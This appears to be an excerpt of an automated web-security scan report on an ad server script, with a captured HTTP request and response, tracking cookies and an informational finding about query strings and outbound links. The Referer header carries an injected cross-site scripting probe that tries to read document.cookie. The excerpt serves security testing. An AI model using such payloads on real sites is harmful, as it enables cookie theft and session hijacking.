http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=156&nm_c=225&beacon=March2011&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&passback&click=http://r.turn.com/r/tpclick/id/Lm7bCHw6eXghHg4AagABAA/3c/http%3A%2F%2Ftrack1000.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DLmsAAC9rAAD%2FVwAA6AEAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAABBRkZCRTI1MC05QTEyLTQ1MzItQURFOC0yNjdBNDAwRjMxQkEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%3D%3D_url%3D/url/

Request

GET /server/ads.js?pub=5757398&cch=5766863&code=5766871&l=728x90&aid=26076973&ahcid=1248825&bimpd=tnh5kOIQk2255pLWanK2LZcOZ0Xe7XRsNtaCSNRj4eWbIaTt5sEN22cf7T9inXGCfevepAsIOj8SO6gD6WEWNkBwM6lThrHlUbylbPzsNzPAPrC9HuVVdOdoSVIf4Q7vKdiNp00MG-4g-SW2wXsWr8hPXeTg3iWuK9dzXzQhDWXuf_W85AIbu_k4MXFVPhvxl49Gd7eGbohUola1IsAqNHH4_eRRABd-o2OeqNW9Zq3hEvRTxe2MfmNbZ8SKKyJZjq9EazwvV7Hgj0fjo5qk4uoWDBDa085haSo4Ny4dtVJvorUFStWcmqm4mTok4izxBR6k7MPjiYBn-7wSi5rTeEad-z_DTQa9xbq74o7BB2XjCdCq-rr8Gs1UOPSaG-9QZ4hcG6ggrefD0sHcxXQl_d2s0r6IWtKQA0bj6O4krNIboWExY7KVnwMSJJjA1mZn01FWo7q4vy41vm34Pwc39gHL8ldgaJXLC7KSPErv5i6EH7pQDizJVheCqGlHyIJ07oZEmsV4wSAw3PEMhjBD_FiVGn_YtAvnYgb7ZUL3ZEoEIfzyuC8lfs_POr6ay0Jn108ZeReclWINle-JSAAivAs7DOhel4FONo1xaTGK_aPq-VtXEhMZXDtuJRuxtDZ-SGFk_WZ6yZGEkt5qJKz6W6KuT2zukDvKDEXMusigDnO0plXh3bgNH5J4x6oZdN_2LFuzw_a8Is3Hy9klMovqk4U4nuS2y2UnpCnJQaY9S4DkQ0k12v9aZSgHYEYtLfmA_fHyrZgnOjqPZTz8mEnm3dsOwc5I7-3REYjKbqgdudCmml7qFPFP7mN0WUKc-4figX1kYndVR773TaDO4Pbi8sspNzvlLkqIgSvILLcYfmfRlbjI2Q6PAnDkDwTkX2GTvkrlJSiqAcAga8WZiP6MNA&acp=1.4703&3c=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=LmsAAC9rAAD/VwAA6AEAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAABBRkZCRTI1MC05QTEyLTQ1MzItQURFOC0yNjdBNDAwRjMxQkEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url= HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=CuIdyNnNbsd8IFR5CESMwk5_AoqRQoxQlknjNiZmToHG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6Ye8sHu_4bGJr09YnZmqiqYnTG8vXtMcexI5g_6ntO2wVudVjXv710qx_I9zopHzosdGJ7AS1T6b5wiqmkpXpXdnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlIctgzop7L7m_ggs3PS7FLE0J_7oKjjzxbQbmixkRIYsHgcoS23WeHIgf_ApGB4ffykrPnoMmRtmOJTHuT4TLZswcYgCM7hKMCgsWzWU7StbEax1et2JxE0L6wqLjDdN2PjxtpnGLlrQ_v1_iIsNK3YbLvHH5DlZJnRA5TSggml5Vkx5hzJv_ogNmMnEecKQZ9TLZm6WlDbMzjxLwgMw3CMh3l1YEzqVjRPlCzU3sWqfGD3wSmKO4ttba9K0UuGWbDgtU7dib_VO4FYHBtZpXpxtgrDqQSfnHriEQfizDMop5Nlbka3cRHmW8JQbh5rTTYem1Og1flGKbh_GovT30ECBf74GlYyuvK9KnnIK8apm8pSycih6imKgjYngGQOdM2V7ruefAgc2DnSqRyDQHo09zZyCvywlaxJzfgdiIDDEbcEKy81Pxn5UwuWEd2NKdFk_cv5dlDFn-C7tAFxoeY4T7tyHWJjTSDIaJ1V_RMz19-GhRUIjuqdf6tJnR1NsAxe1z9ss6NXEdoBdHz1XXKNDOG1brXgeroIzd4C80BOQ5jllwylPntI0EFsF2fygOKzQfzs6tcbyLYy_I5kqleHXpcp61V_C97XLclj0PfNXbkGgVVrmLrpBl0wPQu0ZWN9PsRCwdrigvWm3hew5vSwfUn8cfIJteWX0KbGv_oMQyUSDxON3ZpXzbrcCtDhr1CrDQNprqT6LTvPSdTOxkAnyY7UhaqUCgmiIsYjYAfluMNhNF6QvDKF3FAvRLyyKgxwPafVsNCGDp8FUznCm_OeYPXW6COfNgsXeriVOqmy6A8g1H80g-BazvB_U5pzrNj2VtuePwYbxARyfSM0IxpDwROKZjbMK9VuySUPZ58x4b-T7KW5NHyxpI3gL4kr15i9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIkeIetYnnl8gEyAgKZsW3xt6Dp_PeiyOD9QEUIwytD75uv-icKe0iPEBilltibzylcftZtsmjbDphE8x5XJBiuHH7WbbJo2w6YRPMeVyQYrhx-1m2yaNsOmETzHlckGK4cDq2CEfDid4wszbuaXE_TN0eUuYzj60ncUd4EVOJsejdHlLmM4-tJ3FHeBFTibHo3R5S5jOPrSdxR3gRU4mx6ITxCe407s0emJ3U9w9WXXkoTRX2fSbc7i_OzYNa_f3daWr1xXE0MIDwS9tWvxZrnGhxCyOEwJ6UEOxJDdP_5dhocQsjhMCelBDsSQ3T_-XYaHELI4TAnpQQ7EkN0__l2LzzRIHgCvOQow5SgLAWHHexSsvN7MDtJFV6wRit1nx5; fc=MWp4cE5jbv0XEkz_Ctovfc4qcg9-bn9SwzG9UG7pVfH7Nj5bGHqXk2A06xn0orl8mNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rST9NoqOhx59MhzvvL9oVqmIEEoaWdqdoBsvj70rBbRHxkrMB3cW0HroQP3xwOFfJNfuj8s2SsJjw03czPperUqzHVjXTBrUPRIETuoZhexzc; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1; pf=aLsDVyMqhKHeii6Uwz31WAjNZfnIsPMrzeScHxoGK2woGO6LE3ZgHgFtheciUOMPxhx5ALNZJagJ4MhMImSgOyZYSYD-rVlIwa9D5_92X_BxuMgVtRHYvXDcwPGFmUbA9yr3sJrejbm1K8I5IUt_E7DUwt8fKmuXsm-ULto69u7BBWMLWnWc0FeHJbCBa5rlUQR23LlkHa8uYDyOVUVTmv40Ro671LeN3Wlubs4cCGM4soIkFGGt-y89X4WUPbe7wQkG09-SBe2R-SGVJSAFNhC5wkZRiNXNllFM6M2OkijEQJUZ2YHjDMxhB2buPLof5qBEFX8XCWOZWBQnfeOm9AL1AOPCa6xvt0w0dDmrvf0AUKcX4xSQkPWqBwmZ4N_bY9W_t_uEAFwA2Uz_fn2y8C97FgfpRN6ABlIUFHbReHXEI8mq1j0LRxkaGeusjy0UmDpdwzxriESd56aLpX9aSppY9_vOu-BYTWCZSjy8gO9mXm4zRVw1uQylZ8x_-PD6tMog1yKd227kUr23dvYhU1iU-mNbgfuywediah06WPG1fNY_Y119IKoplApzM8RG_XsgyBox_I1kITpB8IUrLqL1A2CbHyCkimbfE-VJsBTpnIRZs02RLCzCcN9YEe_l3w0EYnWy6CBe91q9Vg0vftlo7RBQUPLwrsQbcCd_aH_HAUxRTL-nLOAtpGQk5cH-Y8qN8pCyHzm7ot3IC4B8JNT3F0z_HYXCN3zvFo1CZroZV4RQ8DqyU6dFcL11Gl53MRAajaTBg3Tq55ij-_kdKYFh_aLep49rt-amMQBFW08R6vek7mr8hMN138hP2UbCBW4vyHkFegGXVHmrWC3ksHmI1Am0h1i8tgdmqK-YXZYdNjAT32jJ--eLi62VK3jcgdZGZdUKh-y6JxdE3NBKAQ3C15LEL3nzzznmk_x6Kb800PEiCmZ4j42r-UMjnASfZKms6uen7EU2GLCpumlV8Sbck29n7D_m_sR7od5a16ngN8b83vIwTU90RtvVVmX_GiDxJbXoRs-4NcPnFNPvjAhF-k9VyJROiTzRJDjQmUi8u6nFta_TBDp7_fAFF-9HgRXz1r-c051yjBPpH4ERsGyeMiF_1QB_bD2sI6jhQBaY2XN64bSRCNBZJcjQ03DvKCTEqG5EdiW79SGwU-5F9zhu6xGk4eaVQAhUcdXR9nUg7UgFFhf7BaOn0w7KANlB62iujrgb8vLFsrqjXHGILuO4b10TzMY0UIeXzDmIASqNpoFbU0pQcmhrYTja5B3p9aB0RqrlU2OWxb7w9KP2tl5mZSyBhvT8DYm5WLpAx4ltbAF_VW3K-06MPejLzVstaQJ6_8DrdB-bdaqsHSC2hxv9W2KsGZ9RTcPHyp8Nk5oFmmstlDHBlLAwLmCm1ZJj5t5dVJL0Dq3U5IvA88hj0qLSbQ7FEhc-Md4YAPWKQ-HOpLiEy4fHyVBV1UCkKiOozLKuE0PygCF7WfOno0k5gEvsFRmR6vPAiiUcvSn-eorAOtLLzMHkUyFxPprkdIx5_ZHlcLUhEjyoswLOX68Mgw; uid=4325897289836481830

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Wed, 15 Jun 2011 11:19:39 GMT
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:39 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=9g9kZhPv1963NGkLesxjHWJZR1jvwlTooXTgTBkD-tVh-L3XcPmT4hHXOQgApIlYUvSqfJIE907ks95Y_1svQCF1eMkkECDog7kf8Icmzr2aCkjSsZ0OgQjTMY-g_jK6LyvsV_9-dutVMNUCXwNPV9-Le7L285aKaYIwg1ahqAjHT08HBTI8V-ChK5uAOAuLZTTe0vpvoxaRfRGBwUKU7f1hwV7mOvQbWPJpDE6ZfFLdaSeJCiETTyT8BcfoKihpi5egMzviTMCFgHPYb3FcywOhnsTTZcwQ2O_cKWdWHnSsDqIHP5YNhRkVC3B7qZ8Eh79b73lkmxqxvi1j1RdMvAAutzD20wVMugC59UQ6j35EaOHUcJUOl4kdTkLfp8usi1jBMfKHBcBQFeLoPo-o9WbPWWMTQYSWhfcCNzhqNaSBYfzsR0_VqvL5CyLVCCe0fyN703zwwC8yM2JzX-FR2zvE9ujVyUnmSWQNnPpwhdq1uwMA7iZtQ-ABBZnlRLpDJwnJhUEi557WBLLHmYtpQh2H1MjxGgjZiXGKQFAKoOnn_NAgBVHmmFSwqB4DeuRUoXDxVMdRm_AbJ8OgF6lFmZeFK0Z25wZQKkBI3M6aKCDl-YP4BvHw-l3DR0UswbJQizZCnixkWx5MfheqiluOQIVw4Px0mmJn3mOnOBsk-NxIdnJEQ5oHeoGsoFwZ6GdtkI6BQ9F7CvePk-AGmUgLc7zC9K07AXgRsZjWe_2hhT_kNgeGLbgjzBot3IZgF_f4kzsHvoLCAFAC0zCBcM9NrpS2io71EoSzYqeMcmAvehmpVBC7_wvmXhCOtUhV5zi9np1QzEJYSzTP0lsMJAKFswOhnsTTZcwQ2O_cKWdWHnQLnvHc6sKeGsmRfbtt4_Y5bI9kEwO7M2X8CY2LcZvBU1NWjGpRF7SN1HG7fyYJiHMFArtVAW15m1tSpyM6_7oCi1jBMfKHBcBQFeLoPo-o9XAAdniaP069lM2OpGxWcGNdNXVDk7dJQtu8q4_G3QiUwKb3LgFGrBBtOCPy2azjYSs7aku09h3V1RuQifS5Pre1uwMA7iZtQ-ABBZnlRLpD-jwDSubTVb0cAvhp4XDAqR2H1MjxGgjZiXGKQFAKoOnRkf9NeMDaVZBok5TC-BSBNX57NssNlEBYiMgkf1SK2JeFK0Z25wZQKkBI3M6aKCDJHVRF1ubHoYgFzLqj5HYfizZCnixkWx5MfheqiluOQK8E1U4eXMq26xe0gR7VfoPsdDk3tpJEYASee_4wLa6WWi2M5Mq0YApA6nEeLhzvrOYcl1oDn5rsIdj2OH_WrpnkNgeGLbgjzBot3IZgF_f49vmeREIy_E2SB4HAmG8eG1SlM1au6a11Q6rHN4iHG9FtOADQXpV1iwqAGUrAzWrk6GBb0t92GxeBwdhbi6dcBiZtoM5MQLdlWz6TTvD7m9YSh3XC4g-DYVUmOdcCDYbjA6GexNNlzBDY79wpZ1YedIS1sJEQCSzAWo7hpI60p9STIFWBeSk0WOZBVLYN2pdUVfbssrWVCILR9Q2r5Q6iBmC7fNpCd51uTPX5Hv7J7BWLWMEx8ocFwFAV4ug-j6j1XUY58YQPVeaDTBmZB9gJI2DRE96WE3QMExTjZO8pzSxhK5apTj1MdT5O0LPkg9HKv8Cn14IgelBJP6dQdZ84_bW7AwDuJm1D4AEFmeVEukOtpRJls2NCAz0XQFNVGB0AHYfUyPEaCNmJcYpAUAqg6f_hI4oE4cwQoszST_ap7ME_M-4EOHPiLCncVsW-7Zmwl4UrRnbnBlAqQEjczpooIIGFK246fBFWqno0adArt_WLNkKeLGRbHkx-F6qKW45AhCc76QPUVTJAZgsy7-gh8BPE14pEXMrtW4MGILJ4L9xaLYzkyrRgCkDqcR4uHO-svG0wrTho_MYyHVlEZYO_nOQ2B4YtuCPMGi3chmAX9_hIXFs-lSVtSyrwT0rex3eekjz8H1_HYURSZQ2NUK7Pzt1pJ4kKIRNPJPwFx-gqKGkNzwIdXWDmtD5QEWQ7nKDmA6GexNNlzBDY79wpZ1YedG5yW8HxeyI4UDWHeYSrbXcI0BTnQxz4DKH0qGCN5dyGAC63MPbTBUy6ALn1RDqPfmxY3PALlwGrz6ViCtpIhyOLWMEx8ocFwFAV4ug-j6j1shqS8GWqYj4QFcb2YW2xzM_lsqFBzsJxsWm8TkRMGuT7OnsVNIqDpCPs1pRqNs1l1G1gsBgZ7iZalIeLNh4NcrW7AwDuJm1D4AEFmeVEukMIC69GIuVsQGe-jfBoYqrxHYfUyPEaCNmJcYpAUAqg6V1gNSzgFFozzWGJFGBE_11vP-Z_-XpRGToCFDVPZsD1l4UrRnbnBlAqQEjczpooIDovJ2RHTvm5_LRotTRnKbSLNkKeLGRbHkx-F6qKW45ALl-xg9YMC_MQM7Rt59wgUBrPN5mGYHa54gNIpPOoQtWNphb1tiXv4Hpw4TmmgeX3jaYW9bYl7-B6cOE5poHl9-FQKA97JyDcwXMA5gFUlebhUCgPeycg3MFzAOYBVJXm4VAoD3snINzBcwDmAVSV5uFQKA97JyDcwXMA5gFUleZWLEDY35YN5Q6eDqLjbgw3VixA2N-WDeUOng6i424MN1YsQNjflg3lDp4OouNuDDdWLEDY35YN5Q6eDqLjbgw3_3_HvWWWx34bNWk5Kc8iFW9kpzZNM5P8AyHENmrxplVvZKc2TTOT_AMhxDZq8aZVb2SnNk0zk_wDIcQ2avGmVVioxAi5DX3vty-DKfuzZVtPQIqolyxz3eYkc0H-Ge4v6_RDXYOFHFnYlYtZJ_cGbOv0Q12DhRxZ2JWLWSf3Bmy2alHM1PmIKLStYU4J01KebJ89DPGaw0dvoSWQY3VyU2yfPQzxmsNHb6ElkGN1clNsnz0M8ZrDR2-hJZBjdXJTbJ89DPGaw0dvoSWQY3VyU7gHWGPWh9kHDp0rygm1elfHs206-IdHyPVNtuu8TAatx7NtOviHR8j1TbbrvEwGrcezbTr4h0fI9U2267xMBq2PI9vNHak0wRz9Aib6pFOncTTN3xFoKrKqr2aXajok3nE0zd8RaCqyqq9ml2o6JN5xNM3fEWgqsqqvZpdqOiTecTTN3xFoKrKqr2aXajok3stjtv7rnKGh6U1A3iFBZdFQRq21JzBaoj6-3jzpNXsV5i-8ZKgCcUO9NG_y18KGzkTTMmYp0faheatezpfXaC1E0zJmKdH2oXmrXs6X12gtRNMyZinR9qF5q17Ol9doLceIo8LaT3yuC0xE-Ud32rmJMVQL5ACDeozyf1O8Ly3ciTFUC-QAg3qM8n9TvC8t3IkxVAvkAIN6jPJ_U7wvLdxKWSl4FtrbirPTr4Wigz9rV_qPKiGKwtipgc0A3RNR_lf6jyohisLYqYHNAN0TUf7YIsC_bVt8rZ2nB53-5Ix-hZe3qZ01pJNZtDU21xZ_2oWXt6mdNaSTWbQ1NtcWf9pOSA1wFInuMzatKNZK3fVshltB45Th1ASpU93MGxXZi4ZbQeOU4dQEqVPdzBsV2YuQdzG9qWFZ4efGfiv_t82erFLbAahzlfqyCnEULp4Tl7-FqlWutFPE7x5C391OhZo; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:39 GMT; Path=/
Set-Cookie: fc=-LOx9o44ltFNq-ujP2srAcfS_e5WPtMUk406r8TrC_qqlZbi8OtpyiRwC3bGcdNYqLcvXewLkRbbhMxP5KrQ6js1B_gXcB-qUuts5vF-XAQJlqbR_nvs1sBCEK8H0zsggPXNQXftUvkrxM0P6rfx7tyTqQnfFF8yP7lyDdApkMNAo-ogpBlnR5BYnOyEkNWawtlERSvOPrTpGB7MHk16r8Ju2Q5CFzOofxhrtvVZ_yc0vJyFmFSo3fJlYsv6pAPh2hGJYNwpXrvgU2zjApqVDZL5cbZhV5I_iyefepQo85w; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:39 GMT; Path=/
Set-Cookie: pf=MBHnuP0ACAICDyqi9htOI9tYulJb6_teK0jwrdqk1Ci9NuH-7Dbi6B51EnTYR5-i0x-hYlCbOQDhhlVqPJSSTRteMrrje8AAyt_0AQWiHXcmka8RIRKSsF1jjtV6gI5bljvN0VRTfDPzhiZhKzxoF_rp1CVxF2mczlcxrXlKeIt_e97B5v4gtIwRb9gWerT6SZNfDixsQmcvwT3cj6qsD1YUGW8kAIFGjnsHsQubrGhyd-a6SoFtlzPI1m7lqOrzKG62Ouoq_MnCBexx-IXs0wqFGi20iMryPzKhFIgD9TRKQvWi-gwfjmLH65nG8uDjmRHSyuQWrv6-0K13whBmqMMkBFHXgTQykKVmMrOXkTImGjDMOFGlcFZLXkL5DfMYlNewCtfBYR9k_ubONlcmrNayLhAfbvMx03_QEb7SwOTka-xiDvXxhOXZWX9LSHUpFSBC8e2rD9y9_y_vSTtwLnFM-trIKubtEmFArILuMGV9B58oEFeGFl-N6VKfU94TyqoDXT1z2-LOJoHJJmbycn2VdyRWMoz0MJ92lenB0Enr8KmRHccEmPJbfWloKMqvymfbnNdr76iq20r7UPWKf1cnuH7JxEukYFMLKmfTWaOhlAa-ABMwNuo7Vw33CB7yjmRrMK_4y831eM_Q9ai6iuVxKUcM2zvz07RwR2gDSZO0zsyFtWnf4bgu8uiMcKoKQubbDh7yy7VKoKm3NHyhBPpDv4R2b-LD02LPrfkDoNG-JVF8wGs9QJzZ7X7pmVv1-5-k8QZXYxxPHYXLZ5ZlZ7srGOrmHUGAGAa34SUV_msfG2VPWzgVAeVXUdcic92NhdIXeTMujO6Xkpxqvk5f7Z_aVKOVMmX7GzMccSixrr2FdtRzxraENBQImNBNPmc-76WiVavVIV7dEbeehfvbaQIeFks7prpU3JmJcp6gIfBHgMBwI4Gac8VWiyN-wrJTS7BG-ZJhaA-X7sZihqOeSt3vgqVyZFwe8tv4n9m4XgJOv117Rph82494QFH9nQMOF51d6EB91l-ccAJiFLF8DLuHEpZWJmKwAkG1noZuRpuds8Kghk77jmwldiTPqW35mHKeC6oTX7ekXkI-eu8dKRbg51Pc0eFE3yxviie2JbpWBf4tKIwkwF5Dm_ctyQmlyESbwyVENVhDk-GGLtG4XypAqI29qmodf8CikjvvqBW_WRb_aKxObPalYTPYr86KIHGoqY_KW-Dhqg1PeSYXuUuEVpM3EUxe8KvI5nEdFFnTVy1R1dEXFxxKtSs8wkDM-YxLbPfNba4kF5lJi_U8vGU0IUuOnRQIvCjdWVa1fEhK_KLr5Y7O86QRtAspzmaq-fVrQlWtpfPPkni3CRWGu0h_MtIqxu4McSiriw3E0ny2QdLUoe_B6wgU9jI28wBseOAtpy2e4Fv71-bKOrhX2Caw2SYtp2QZGcaXxiQod_wFsyaXwL0ukkjQ9Ipn5OBK8Esf3AI1vcHkbm5E8hsGB6_YqHw2pmgY9PCpH88o2V6QgiQM3tzkLdBmsBmrJxgO-qwkMNUHQPAIhFwOSHcQvhDlVNrjRUinuOAaHaBMki4; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:39 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:19:38 GMT
Content-Length: 9170

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n    \n\n     \n    \n        \n        \n            \n    \n    \n\n\n\n\n\n\n        \n        \n    \n                \n            \n            \n                \n                <iframe marginheight="0" marginwidth="0" scrolling="no" frameborder="0" width="728" height="90" src="http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=156&nm_c=225&beacon=March2011&url=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&passback&click=http://r.turn.com/r/tpclick/id/Lm7bCHw6eXghHg4AagABAA/3c/http%3A%2F%2Ftrack1000.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DLmsAAC9rAAD%2FVwAA6AEAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAABBRkZCRTI1MC05QTEyLTQ1MzItQURFOC0yNjdBNDAwRjMxQkEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA%3D%3D_url%3D/url/"></iframe>
...[SNIP]...

18.63. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=17007146&cch=17007159&code=17009760&l=300x250&aid=26342010&ahcid=1531046&bimpd=w267z5110-9lCkCiWdsYSV7sjmP2vZics1lAC4XhKUfb4kL0Ncw8VXNyAV_be8l5SHeXp-hmZKD4RpSjvqOdG21o7MsysEszRVcBDJIalIkcyfcPYGdiivpMVVSAGujp5Eawc7gLk_EilyoyuMPUoPTcx0iQ7pkfLORb9M9xD2FUeC0wDTfA5mvCssGb3HrKdxRTD-jqIL-v0YTzBWu_RokSebFQIMeJJviX87ikSix9ALRMgCaT0lzBRmv2sayVeoUUyR5eECeK9oawV_Z1eCi6tZC4nl9TvPom1PzOgGawtj3ie9632RT2m6tP27U9VCTO0Z9qNlkaHSu_VCqQOhlNRVFDjU5ZPYLM1pjPT4UggfEbVGXBgYobQGfbbdicpaoKA-dGnIDVsiTG_g96RNlq_zeeNdeFcq4oFJRsDcuSn4_qc9btE5vDu1TqevbQmiRauhE9MEviof26QZBwgtmyu_XeZQTM0Y5XRGWekIAl6aeGF6TADpa--Qg5xiWTbDGCq9dVoD3OClkdQUStaHewv1pRAeIFVZ-iMQ-tUT2DENyJrUdac3HvIx7P6cw_vfBz5xDsVEqchMpjM7fNhUkeamWhz6Jchpm_0zqK4gHhysz5NY-NvflAxBiZOOJStYS6nlnxtND_oAWqhGuJS-RwKhhRT6kRg9Ghb1H3mX02ibIJMy03hgdmmQTrNl6RMGvMg1hhDuP_7RzXq5wKDQCqQzeglsazfw-kFnFBMAlP2swrszR321kqEYVzyCBN1x0nzkrk9isQgxKCLtC5KT0eNAVlx2_cypz-tDXFNnQESrjXxNhaCYm_Kc00u342slyHQEDQxxIZ5WyOVdTz2nrlxRM2H1Qjs8vHgR3oeWT0BYUtCefE4mCGdr4rPFcR&acp=2.125

The response contains the following links to other domains:
